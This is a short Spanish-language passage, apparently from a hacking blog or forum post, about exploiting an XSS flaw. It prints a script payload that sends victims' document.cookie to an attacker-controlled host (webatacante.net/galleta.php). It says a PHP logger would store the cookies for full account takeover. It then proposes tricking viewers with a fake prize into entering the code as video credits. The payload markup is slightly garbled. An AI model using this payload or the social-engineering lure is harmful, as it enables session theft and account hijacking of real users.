Aquí podemos ver un
XSS inofensivo, aunque podría utilizarse para robar las cookies, consiguiendo así privilegios completos, un ejemplo seria este código:
<>document.location="http://webatacante.net/galleta.php?galleta="+document.cookie;< /script >
El código del
PHP simplemente guardaría a un archivo de texto plano el contenido de la variable galleta, con lo cual solo nos quedaría robar esas cookies, teniendo acceso completo a la cuenta afectada.

Aun así, al
no haber un método directo (o no descubierto) de hacer esto, como puede ser en los
XSS por link, habría que hacer un poco de uso de
ingeniería social, quizás en un vídeo dejar el código, prometiendo un premio si se introducen como créditos en el mismo vídeo, añadiendo al final el
"código del vídeo", que no seria mas que nuestro
XSS.
